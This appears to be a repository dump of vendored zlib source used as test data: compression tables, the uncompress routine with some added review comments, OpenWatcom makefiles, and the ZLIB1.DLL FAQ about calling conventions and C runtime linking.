================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/trees.h ================================================ /* header created automatically with -DGEN_TREES_H */ local const ct_data static_ltree[L_CODES+2] = { {{ 12},{ 8}}, {{140},{ 8}}, {{ 76},{ 8}}, {{204},{ 8}}, {{ 44},{ 8}}, {{172},{ 8}}, {{108},{ 8}}, {{236},{ 8}}, {{ 28},{ 8}}, {{156},{ 8}}, {{ 92},{ 8}}, {{220},{ 8}}, {{ 60},{ 8}}, {{188},{ 8}}, {{124},{ 8}}, {{252},{ 8}}, {{ 2},{ 8}}, {{130},{ 8}}, {{ 66},{ 8}}, {{194},{ 8}}, {{ 34},{ 8}}, {{162},{ 8}}, {{ 98},{ 8}}, {{226},{ 8}}, {{ 18},{ 8}}, {{146},{ 8}}, {{ 82},{ 8}}, {{210},{ 8}}, {{ 50},{ 8}}, {{178},{ 8}}, {{114},{ 8}}, {{242},{ 8}}, {{ 10},{ 8}}, {{138},{ 8}}, {{ 74},{ 8}}, {{202},{ 8}}, {{ 42},{ 8}}, {{170},{ 8}}, {{106},{ 8}}, {{234},{ 8}}, {{ 26},{ 8}}, {{154},{ 8}}, {{ 90},{ 8}}, {{218},{ 8}}, {{ 58},{ 8}}, {{186},{ 8}}, {{122},{ 8}}, {{250},{ 8}}, {{ 6},{ 8}}, {{134},{ 8}}, {{ 70},{ 8}}, {{198},{ 8}}, {{ 38},{ 8}}, {{166},{ 8}}, {{102},{ 8}}, {{230},{ 8}}, {{ 22},{ 8}}, {{150},{ 8}}, {{ 86},{ 8}}, {{214},{ 8}}, {{ 54},{ 8}}, {{182},{ 8}}, {{118},{ 8}}, {{246},{ 8}}, {{ 14},{ 8}}, {{142},{ 8}}, {{ 78},{ 8}}, {{206},{ 8}}, {{ 46},{ 8}}, {{174},{ 8}}, {{110},{ 8}}, {{238},{ 8}}, {{ 30},{ 8}}, {{158},{ 8}}, {{ 94},{ 8}}, {{222},{ 8}}, {{ 
62},{ 8}}, {{190},{ 8}}, {{126},{ 8}}, {{254},{ 8}}, {{ 1},{ 8}}, {{129},{ 8}}, {{ 65},{ 8}}, {{193},{ 8}}, {{ 33},{ 8}}, {{161},{ 8}}, {{ 97},{ 8}}, {{225},{ 8}}, {{ 17},{ 8}}, {{145},{ 8}}, {{ 81},{ 8}}, {{209},{ 8}}, {{ 49},{ 8}}, {{177},{ 8}}, {{113},{ 8}}, {{241},{ 8}}, {{ 9},{ 8}}, {{137},{ 8}}, {{ 73},{ 8}}, {{201},{ 8}}, {{ 41},{ 8}}, {{169},{ 8}}, {{105},{ 8}}, {{233},{ 8}}, {{ 25},{ 8}}, {{153},{ 8}}, {{ 89},{ 8}}, {{217},{ 8}}, {{ 57},{ 8}}, {{185},{ 8}}, {{121},{ 8}}, {{249},{ 8}}, {{ 5},{ 8}}, {{133},{ 8}}, {{ 69},{ 8}}, {{197},{ 8}}, {{ 37},{ 8}}, {{165},{ 8}}, {{101},{ 8}}, {{229},{ 8}}, {{ 21},{ 8}}, {{149},{ 8}}, {{ 85},{ 8}}, {{213},{ 8}}, {{ 53},{ 8}}, {{181},{ 8}}, {{117},{ 8}}, {{245},{ 8}}, {{ 13},{ 8}}, {{141},{ 8}}, {{ 77},{ 8}}, {{205},{ 8}}, {{ 45},{ 8}}, {{173},{ 8}}, {{109},{ 8}}, {{237},{ 8}}, {{ 29},{ 8}}, {{157},{ 8}}, {{ 93},{ 8}}, {{221},{ 8}}, {{ 61},{ 8}}, {{189},{ 8}}, {{125},{ 8}}, {{253},{ 8}}, {{ 19},{ 9}}, {{275},{ 9}}, {{147},{ 9}}, {{403},{ 9}}, {{ 83},{ 9}}, {{339},{ 9}}, {{211},{ 9}}, {{467},{ 9}}, {{ 51},{ 9}}, {{307},{ 9}}, {{179},{ 9}}, {{435},{ 9}}, {{115},{ 9}}, {{371},{ 9}}, {{243},{ 9}}, {{499},{ 9}}, {{ 11},{ 9}}, {{267},{ 9}}, {{139},{ 9}}, {{395},{ 9}}, {{ 75},{ 9}}, {{331},{ 9}}, {{203},{ 9}}, {{459},{ 9}}, {{ 43},{ 9}}, {{299},{ 9}}, {{171},{ 9}}, {{427},{ 9}}, {{107},{ 9}}, {{363},{ 9}}, {{235},{ 9}}, {{491},{ 9}}, {{ 27},{ 9}}, {{283},{ 9}}, {{155},{ 9}}, {{411},{ 9}}, {{ 91},{ 9}}, {{347},{ 9}}, {{219},{ 9}}, {{475},{ 9}}, {{ 59},{ 9}}, {{315},{ 9}}, {{187},{ 9}}, {{443},{ 9}}, {{123},{ 9}}, {{379},{ 9}}, {{251},{ 9}}, {{507},{ 9}}, {{ 7},{ 9}}, {{263},{ 9}}, {{135},{ 9}}, {{391},{ 9}}, {{ 71},{ 9}}, {{327},{ 9}}, {{199},{ 9}}, {{455},{ 9}}, {{ 39},{ 9}}, {{295},{ 9}}, {{167},{ 9}}, {{423},{ 9}}, {{103},{ 9}}, {{359},{ 9}}, {{231},{ 9}}, {{487},{ 9}}, {{ 23},{ 9}}, {{279},{ 9}}, {{151},{ 9}}, {{407},{ 9}}, {{ 87},{ 9}}, {{343},{ 9}}, {{215},{ 9}}, {{471},{ 9}}, {{ 55},{ 9}}, {{311},{ 9}}, {{183},{ 9}}, 
{{439},{ 9}}, {{119},{ 9}}, {{375},{ 9}}, {{247},{ 9}}, {{503},{ 9}}, {{ 15},{ 9}}, {{271},{ 9}}, {{143},{ 9}}, {{399},{ 9}}, {{ 79},{ 9}}, {{335},{ 9}}, {{207},{ 9}}, {{463},{ 9}}, {{ 47},{ 9}}, {{303},{ 9}}, {{175},{ 9}}, {{431},{ 9}}, {{111},{ 9}}, {{367},{ 9}}, {{239},{ 9}}, {{495},{ 9}}, {{ 31},{ 9}}, {{287},{ 9}}, {{159},{ 9}}, {{415},{ 9}}, {{ 95},{ 9}}, {{351},{ 9}}, {{223},{ 9}}, {{479},{ 9}}, {{ 63},{ 9}}, {{319},{ 9}}, {{191},{ 9}}, {{447},{ 9}}, {{127},{ 9}}, {{383},{ 9}}, {{255},{ 9}}, {{511},{ 9}}, {{ 0},{ 7}}, {{ 64},{ 7}}, {{ 32},{ 7}}, {{ 96},{ 7}}, {{ 16},{ 7}}, {{ 80},{ 7}}, {{ 48},{ 7}}, {{112},{ 7}}, {{ 8},{ 7}}, {{ 72},{ 7}}, {{ 40},{ 7}}, {{104},{ 7}}, {{ 24},{ 7}}, {{ 88},{ 7}}, {{ 56},{ 7}}, {{120},{ 7}}, {{ 4},{ 7}}, {{ 68},{ 7}}, {{ 36},{ 7}}, {{100},{ 7}}, {{ 20},{ 7}}, {{ 84},{ 7}}, {{ 52},{ 7}}, {{116},{ 7}}, {{ 3},{ 8}}, {{131},{ 8}}, {{ 67},{ 8}}, {{195},{ 8}}, {{ 35},{ 8}}, {{163},{ 8}}, {{ 99},{ 8}}, {{227},{ 8}} }; local const ct_data static_dtree[D_CODES] = { {{ 0},{ 5}}, {{16},{ 5}}, {{ 8},{ 5}}, {{24},{ 5}}, {{ 4},{ 5}}, {{20},{ 5}}, {{12},{ 5}}, {{28},{ 5}}, {{ 2},{ 5}}, {{18},{ 5}}, {{10},{ 5}}, {{26},{ 5}}, {{ 6},{ 5}}, {{22},{ 5}}, {{14},{ 5}}, {{30},{ 5}}, {{ 1},{ 5}}, {{17},{ 5}}, {{ 9},{ 5}}, {{25},{ 5}}, {{ 5},{ 5}}, {{21},{ 5}}, {{13},{ 5}}, {{29},{ 5}}, {{ 3},{ 5}}, {{19},{ 5}}, {{11},{ 5}}, {{27},{ 5}}, {{ 7},{ 5}}, {{23},{ 5}} }; const uch ZLIB_INTERNAL _dist_code[DIST_CODE_LEN] = { 0, 1, 2, 3, 4, 4, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 
14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 0, 0, 16, 17, 18, 18, 19, 19, 20, 20, 20, 20, 21, 21, 21, 21, 22, 22, 22, 22, 22, 22, 22, 22, 23, 23, 23, 23, 23, 23, 23, 23, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29 }; const uch ZLIB_INTERNAL _length_code[MAX_MATCH-MIN_MATCH+1]= { 0, 1, 2, 3, 4, 5, 6, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12, 12, 12, 12, 13, 13, 13, 13, 14, 14, 14, 14, 15, 15, 15, 15, 16, 16, 16, 16, 16, 16, 16, 16, 17, 17, 17, 17, 17, 17, 17, 17, 18, 18, 18, 18, 18, 18, 18, 18, 19, 19, 19, 19, 19, 19, 19, 19, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 23, 23, 23, 23, 23, 23, 23, 
23, 23, 23, 23, 23, 23, 23, 23, 23, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 28 }; local const int base_length[LENGTH_CODES] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 10, 12, 14, 16, 20, 24, 28, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 0 }; local const int base_dist[D_CODES] = { 0, 1, 2, 3, 4, 6, 8, 12, 16, 24, 32, 48, 64, 96, 128, 192, 256, 384, 512, 768, 1024, 1536, 2048, 3072, 4096, 6144, 8192, 12288, 16384, 24576 }; ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/uncompr.c ================================================ /* uncompr.c -- decompress a memory buffer * Copyright (C) 1995-2003, 2010, 2014, 2016 Jean-loup Gailly, Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #define ZLIB_INTERNAL #include "zlib.h" /* =========================================================================== Decompresses the source buffer into the destination buffer. *sourceLen is the byte length of the source buffer. Upon entry, *destLen is the total size of the destination buffer, which must be large enough to hold the entire uncompressed data. (The size of the uncompressed data must have been saved previously by the compressor and transmitted to the decompressor by some mechanism outside the scope of this compression library.) Upon exit, *destLen is the size of the decompressed data and *sourceLen is the number of source bytes consumed. 
Upon return, source + *sourceLen points to the first unused input byte.

     uncompress returns Z_OK if success, Z_MEM_ERROR if there was not
   enough memory, Z_BUF_ERROR if there was not enough room in the output
   buffer, or Z_DATA_ERROR if the input data was corrupted, including if the
   input data is an incomplete zlib stream.
*/
/* NOTE(review): the only limit on the amount of output is the *destLen value
   passed in. When the compressed data is untrusted, an expected size that
   travelled with it is untrusted too; check it against an application limit
   before allocating dest. */
int ZEXPORT uncompress2(Bytef *dest, uLongf *destLen, const Bytef *source,
                        uLong *sourceLen) {
    z_stream stream;
    int err;
    const uInt max = (uInt)-1;  /* largest piece handed to the stream below */
    uLong len, left;    /* input / output bytes not yet handed to the stream */
    Byte buf[1];    /* for detection of incomplete stream when *destLen == 0 */

    len = *sourceLen;
    if (*destLen) {
        left = *destLen;
        *destLen = 0;   /* stays 0 if inflateInit() fails below */
    }
    else {
        /* No room was given: decode into the one-byte scratch buffer. */
        left = 1;
        dest = buf;
    }

    stream.next_in = (z_const Bytef *)source;
    stream.avail_in = 0;
    stream.zalloc = (alloc_func)0;
    stream.zfree = (free_func)0;
    stream.opaque = (voidpf)0;

    err = inflateInit(&stream);
    if (err != Z_OK) return err;

    stream.next_out = dest;
    stream.avail_out = 0;

    /* len and left are uLong while the stream counters are assigned uInt
       values, so input and output are handed over in pieces of at most max
       bytes; the total output offered never exceeds the initial left. */
    do {
        if (stream.avail_out == 0) {
            stream.avail_out = left > (uLong)max ? max : (uInt)left;
            left -= stream.avail_out;
        }
        if (stream.avail_in == 0) {
            stream.avail_in = len > (uLong)max ? max : (uInt)len;
            len -= stream.avail_in;
        }
        err = inflate(&stream, Z_NO_FLUSH);
    } while (err == Z_OK);

    /* Subtract the input that was never consumed. */
    *sourceLen -= len + stream.avail_in;
    if (dest != buf)
        *destLen = stream.total_out;
    else if (stream.total_out && err == Z_BUF_ERROR)
        /* scratch-buffer case: makes the left + stream.avail_out term of the
           return expression non-zero */
        left = 1;

    inflateEnd(&stream);
    /* Z_STREAM_END is the only success. Z_NEED_DICT is reported as
       Z_DATA_ERROR, and so is Z_BUF_ERROR when left + stream.avail_out is
       non-zero. */
    return err == Z_STREAM_END ? Z_OK :
           err == Z_NEED_DICT ? Z_DATA_ERROR  :
           err == Z_BUF_ERROR && left + stream.avail_out ? Z_DATA_ERROR :
           err;
}

/* Same as uncompress2(), with sourceLen passed by value, so the count of
   consumed source bytes is not reported back to the caller. */
int ZEXPORT uncompress(Bytef *dest, uLongf *destLen, const Bytef *source,
                       uLong sourceLen) {
    return uncompress2(dest, destLen, source, &sourceLen);
}
================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/watcom/watcom_f.mak ================================================ # Makefile for zlib # OpenWatcom flat model # Last updated: 28-Dec-2005 # To use, do "wmake -f watcom_f.mak" C_SOURCE = adler32.c compress.c crc32.c deflate.c & gzclose.c gzlib.c gzread.c gzwrite.c & infback.c inffast.c inflate.c inftrees.c & trees.c uncompr.c zutil.c OBJS = adler32.obj compress.obj crc32.obj deflate.obj & gzclose.obj gzlib.obj gzread.obj gzwrite.obj & infback.obj inffast.obj inflate.obj inftrees.obj & trees.obj uncompr.obj zutil.obj CC = wcc386 LINKER = wcl386 CFLAGS = -zq -mf -3r -fp3 -s -bt=dos -oilrtfm -fr=nul -wx ZLIB_LIB = zlib_f.lib .C.OBJ: $(CC) $(CFLAGS) $[@ all: $(ZLIB_LIB) example.exe minigzip.exe $(ZLIB_LIB): $(OBJS) wlib -b -c $(ZLIB_LIB) -+adler32.obj -+compress.obj -+crc32.obj wlib -b -c $(ZLIB_LIB) -+gzclose.obj -+gzlib.obj -+gzread.obj -+gzwrite.obj wlib -b -c $(ZLIB_LIB) -+deflate.obj -+infback.obj wlib -b -c $(ZLIB_LIB) -+inffast.obj -+inflate.obj -+inftrees.obj wlib -b -c $(ZLIB_LIB) -+trees.obj -+uncompr.obj -+zutil.obj example.exe: $(ZLIB_LIB) example.obj $(LINKER) -ldos32a -fe=example.exe example.obj $(ZLIB_LIB) minigzip.exe: $(ZLIB_LIB) minigzip.obj $(LINKER) -ldos32a -fe=minigzip.exe minigzip.obj $(ZLIB_LIB) clean: .SYMBOLIC del *.obj del $(ZLIB_LIB) @echo Cleaning done ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/watcom/watcom_l.mak ================================================ # Makefile for zlib # OpenWatcom large model # Last updated: 28-Dec-2005 # To use, do "wmake -f watcom_l.mak" C_SOURCE = adler32.c compress.c crc32.c deflate.c & gzclose.c gzlib.c gzread.c gzwrite.c & infback.c 
inffast.c inflate.c inftrees.c & trees.c uncompr.c zutil.c OBJS = adler32.obj compress.obj crc32.obj deflate.obj & gzclose.obj gzlib.obj gzread.obj gzwrite.obj & infback.obj inffast.obj inflate.obj inftrees.obj & trees.obj uncompr.obj zutil.obj CC = wcc LINKER = wcl CFLAGS = -zq -ml -s -bt=dos -oilrtfm -fr=nul -wx ZLIB_LIB = zlib_l.lib .C.OBJ: $(CC) $(CFLAGS) $[@ all: $(ZLIB_LIB) example.exe minigzip.exe $(ZLIB_LIB): $(OBJS) wlib -b -c $(ZLIB_LIB) -+adler32.obj -+compress.obj -+crc32.obj wlib -b -c $(ZLIB_LIB) -+gzclose.obj -+gzlib.obj -+gzread.obj -+gzwrite.obj wlib -b -c $(ZLIB_LIB) -+deflate.obj -+infback.obj wlib -b -c $(ZLIB_LIB) -+inffast.obj -+inflate.obj -+inftrees.obj wlib -b -c $(ZLIB_LIB) -+trees.obj -+uncompr.obj -+zutil.obj example.exe: $(ZLIB_LIB) example.obj $(LINKER) -fe=example.exe example.obj $(ZLIB_LIB) minigzip.exe: $(ZLIB_LIB) minigzip.obj $(LINKER) -fe=minigzip.exe minigzip.obj $(ZLIB_LIB) clean: .SYMBOLIC del *.obj del $(ZLIB_LIB) @echo Cleaning done ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/DLL_FAQ.txt ================================================ Frequently Asked Questions about ZLIB1.DLL This document describes the design, the rationale, and the usage of the official DLL build of zlib, named ZLIB1.DLL. If you have general questions about zlib, you should see the file "FAQ" found in the zlib distribution, or at the following location: http://www.gzip.org/zlib/zlib_faq.html 1. What is ZLIB1.DLL, and how can I get it? - ZLIB1.DLL is the official build of zlib as a DLL. (Please remark the character '1' in the name.) Pointers to a precompiled ZLIB1.DLL can be found in the zlib web site at: http://www.zlib.net/ Applications that link to ZLIB1.DLL can rely on the following specification: * The exported symbols are exclusively defined in the source files "zlib.h" and "zlib.def", found in an official zlib source distribution. 
* The symbols are exported by name, not by ordinal. * The exported names are undecorated. * The calling convention of functions is "C" (CDECL). * The ZLIB1.DLL binary is linked to MSVCRT.DLL. The archive in which ZLIB1.DLL is bundled contains compiled test programs that must run with a valid build of ZLIB1.DLL. It is recommended to download the prebuilt DLL from the zlib web site, instead of building it yourself, to avoid potential incompatibilities that could be introduced by your compiler and build settings. If you do build the DLL yourself, please make sure that it complies with all the above requirements, and it runs with the precompiled test programs, bundled with the original ZLIB1.DLL distribution. If, for any reason, you need to build an incompatible DLL, please use a different file name. 2. Why did you change the name of the DLL to ZLIB1.DLL? What happened to the old ZLIB.DLL? - The old ZLIB.DLL, built from zlib-1.1.4 or earlier, required compilation settings that were incompatible to those used by a static build. The DLL settings were supposed to be enabled by defining the macro ZLIB_DLL, before including "zlib.h". Incorrect handling of this macro was silently accepted at build time, resulting in two major problems: * ZLIB_DLL was missing from the old makefile. When building the DLL, not all people added it to the build options. In consequence, incompatible incarnations of ZLIB.DLL started to circulate around the net. * When switching from using the static library to using the DLL, applications had to define the ZLIB_DLL macro and to recompile all the sources that contained calls to zlib functions. Failure to do so resulted in creating binaries that were unable to run with the official ZLIB.DLL build. The only possible solution that we could foresee was to make a binary-incompatible change in the DLL interface, in order to remove the dependency on the ZLIB_DLL macro, and to release the new DLL under a different name. 
We chose the name ZLIB1.DLL, where '1' indicates the major zlib version number. We hope that we will not have to break the binary compatibility again, at least not as long as the zlib-1.x series will last. There is still a ZLIB_DLL macro, that can trigger a more efficient build and use of the DLL, but compatibility no longer depends on it. 3. Can I build ZLIB.DLL from the new zlib sources, and replace an old ZLIB.DLL, that was built from zlib-1.1.4 or earlier? - In principle, you can do it by assigning calling convention keywords to the macros ZEXPORT and ZEXPORTVA. In practice, it depends on what you mean by "an old ZLIB.DLL", because the old DLL exists in several mutually-incompatible versions. You have to find out first what kind of calling convention is being used in your particular ZLIB.DLL build, and to use the same one in the new build. If you don't know what this is all about, you might be better off if you would just leave the old DLL intact. 4. Can I compile my application using the new zlib interface, and link it to an old ZLIB.DLL, that was built from zlib-1.1.4 or earlier? - The official answer is "no"; the real answer depends again on what kind of ZLIB.DLL you have. Even if you are lucky, this course of action is unreliable. If you rebuild your application and you intend to use a newer version of zlib (post-1.1.4), it is strongly recommended to link it to the new ZLIB1.DLL. 5. Why are the zlib symbols exported by name, and not by ordinal? - Although exporting symbols by ordinal is a little faster, it is risky. Any single glitch in the maintenance or use of the DEF file that contains the ordinals can result in incompatible builds and frustrating crashes. Simply put, the benefits of exporting symbols by ordinal do not justify the risks. Technically, it should be possible to maintain ordinals in the DEF file, and still export the symbols by name. 
Ordinals exist in every DLL, and even if the dynamic linking performed at the DLL startup is searching for names, ordinals serve as hints, for a faster name lookup. However, if the DEF file contains ordinals, the Microsoft linker automatically builds an implib that will cause the executables linked to it to use those ordinals, and not the names. It is interesting to notice that the GNU linker for Win32 does not suffer from this problem. It is possible to avoid the DEF file if the exported symbols are accompanied by a "__declspec(dllexport)" attribute in the source files. You can do this in zlib by predefining the ZLIB_DLL macro. 6. I see that the ZLIB1.DLL functions use the "C" (CDECL) calling convention. Why not use the STDCALL convention? STDCALL is the standard convention in Win32, and I need it in my Visual Basic project! (For readability, we use CDECL to refer to the convention triggered by the "__cdecl" keyword, STDCALL to refer to the convention triggered by "__stdcall", and FASTCALL to refer to the convention triggered by "__fastcall".) - Most of the native Windows API functions (without varargs) use indeed the WINAPI convention (which translates to STDCALL in Win32), but the standard C functions use CDECL. If a user application is intrinsically tied to the Windows API (e.g. it calls native Windows API functions such as CreateFile()), sometimes it makes sense to decorate its own functions with WINAPI. But if ANSI C or POSIX portability is a goal (e.g. it calls standard C functions such as fopen()), it is not a sound decision to request the inclusion of <windows.h>, or to use non-ANSI constructs, for the sole purpose to make the user functions STDCALL-able. The functionality offered by zlib is not in the category of "Windows functionality", but is more like "C functionality". Technically, STDCALL is not bad; in fact, it is slightly faster than CDECL, and it works with variable-argument functions, just like CDECL. 
It is unfortunate that, in spite of using STDCALL in the Windows API, it is not the default convention used by the C compilers that run under Windows. The roots of the problem reside deep inside the unsafety of the K&R-style function prototypes, where the argument types are not specified; but that is another story for another day. The remaining fact is that CDECL is the default convention. Even if an explicit convention is hard-coded into the function prototypes inside C headers, problems may appear. The necessity to expose the convention in users' callbacks is one of these problems. The calling convention issues are also important when using zlib in other programming languages. Some of them, like Ada (GNAT) and Fortran (GNU G77), have C bindings implemented initially on Unix, and relying on the C calling convention. On the other hand, the pre- .NET versions of Microsoft Visual Basic require STDCALL, while Borland Delphi prefers, although it does not require, FASTCALL. In fairness to all possible uses of zlib outside the C programming language, we choose the default "C" convention. Anyone interested in different bindings or conventions is encouraged to maintain specialized projects. The "contrib/" directory from the zlib distribution already holds a couple of foreign bindings, such as Ada, C++, and Delphi. 7. I need a DLL for my Visual Basic project. What can I do? - Define the ZLIB_WINAPI macro before including "zlib.h", when building both the DLL and the user application (except that you don't need to define anything when using the DLL in Visual Basic). The ZLIB_WINAPI macro will switch on the WINAPI (STDCALL) convention. The name of this DLL must be different than the official ZLIB1.DLL. Gilles Vollant has contributed a build named ZLIBWAPI.DLL, with the ZLIB_WINAPI macro turned on, and with the minizip functionality built in. For more information, please read the notes inside "contrib/vstudio/readme.txt", found in the zlib distribution. 8. 
I need to use zlib in my Microsoft .NET project. What can I do? - Henrik Ravn has contributed a .NET wrapper around zlib. Look into contrib/dotzlib/, inside the zlib distribution. 9. If my application uses ZLIB1.DLL, should I link it to MSVCRT.DLL? Why? - It is not required, but it is recommended to link your application to MSVCRT.DLL, if it uses ZLIB1.DLL. The executables (.EXE, .DLL, etc.) that are involved in the same process and are using the C run-time library (i.e. they are calling standard C functions), must link to the same library. There are several libraries in the Win32 system: CRTDLL.DLL, MSVCRT.DLL, the static C libraries, etc. Since ZLIB1.DLL is linked to MSVCRT.DLL, the executables that depend on it should also be linked to MSVCRT.DLL. 10. Why are you saying that ZLIB1.DLL and my application should be linked to the same C run-time (CRT) library? I linked my application and my DLLs to different C libraries (e.g. my application to a static library, and my DLLs to MSVCRT.DLL), and everything works fine. - If a user library invokes only pure Win32 API (accessible via <windows.h> and the related headers), its DLL build will work in any context. But if this library invokes standard C API, things get more complicated. There is a single Win32 library in a Win32 system. Every function in this library resides in a single DLL module, that is safe to call from anywhere. On the other hand, there are multiple versions of the C library, and each of them has its own separate internal state. Standalone executables and user DLLs that call standard C functions must link to a C run-time (CRT) library, be it static or shared (DLL). Intermixing occurs when an executable (not necessarily standalone) and a DLL are linked to different CRTs, and both are running in the same process. Intermixing multiple CRTs is possible, as long as their internal states are kept intact. 
The Microsoft Knowledge Base articles KB94248 "HOWTO: Use the C Run-Time" and KB140584 "HOWTO: Link with the Correct C Run-Time (CRT) Library" mention the potential problems raised by intermixing. If intermixing works for you, it's because your application and DLLs are avoiding the corruption of each of the CRTs' internal states, maybe by careful design, or maybe by fortune. Also note that linking ZLIB1.DLL to non-Microsoft CRTs, such as those provided by Borland, raises similar problems. 11. Why are you linking ZLIB1.DLL to MSVCRT.DLL? - MSVCRT.DLL exists on every Windows 95 with a new service pack installed, or with Microsoft Internet Explorer 4 or later, and on all other Windows 4.x or later (Windows 98, Windows NT 4, or later). It is freely distributable; if not present in the system, it can be downloaded from Microsoft or from other software providers for free. The fact that MSVCRT.DLL does not exist on a virgin Windows 95 is not so problematic. Windows 95 is scarcely found nowadays, Microsoft ended its support a long time ago, and many recent applications from various vendors, including Microsoft, do not even run on it. Furthermore, no serious user should run Windows 95 without a proper update installed. 12. Why are you not linking ZLIB1.DLL to <<my favorite C run-time library>> ? - We considered and abandoned the following alternatives: * Linking ZLIB1.DLL to a static C library (LIBC.LIB, or LIBCMT.LIB) is not a good option. People are using the DLL mainly to save disk space. If you are linking your program to a static C library, you may as well consider linking zlib in statically, too. * Linking ZLIB1.DLL to CRTDLL.DLL looks appealing, because CRTDLL.DLL is present on every Win32 installation. Unfortunately, it has a series of problems: it does not work properly with Microsoft's C++ libraries, it does not provide support for 64-bit file offsets, (and so on...), and Microsoft discontinued its support a long time ago. 
* Linking ZLIB1.DLL to MSVCR70.DLL or MSVCR71.DLL, supplied with the Microsoft .NET platform, and Visual C++ 7.0/7.1, raises problems related to the status of ZLIB1.DLL as a system component. According to the Microsoft Knowledge Base article KB326922 "INFO: Redistribution of the Shared C Runtime Component in Visual C++ .NET", MSVCR70.DLL and MSVCR71.DLL are not supposed to function as system DLLs, because they may clash with MSVCRT.DLL. Instead, the application's installer is supposed to put these DLLs (if needed) in the application's private directory. If ZLIB1.DLL depends on a non-system runtime, it cannot function as a redistributable system component. * Linking ZLIB1.DLL to non-Microsoft runtimes, such as Borland's, or Cygwin's, raises problems related to the reliable presence of these runtimes on Win32 systems. It's easier to let the DLL build of zlib up to the people who distribute these runtimes, and who may proceed as explained in the answer to Question 14. 13. If ZLIB1.DLL cannot be linked to MSVCR70.DLL or MSVCR71.DLL, how can I build/use ZLIB1.DLL in Microsoft Visual C++ 7.0 (Visual Studio .NET) or newer? - Due to the problems explained in the Microsoft Knowledge Base article KB326922 (see the previous answer), the C runtime that comes with the VC7 environment is no longer considered a system component. That is, it should not be assumed that this runtime exists, or may be installed in a system directory. Since ZLIB1.DLL is supposed to be a system component, it may not depend on a non-system component. In order to link ZLIB1.DLL and your application to MSVCRT.DLL in VC7, you need the library of Visual C++ 6.0 or older. If you don't have this library at hand, it's probably best not to use ZLIB1.DLL. We are hoping that, in the future, Microsoft will provide a way to build applications linked to a proper system runtime, from the Visual C++ environment. Until then, you have a couple of alternatives, such as linking zlib in statically. 
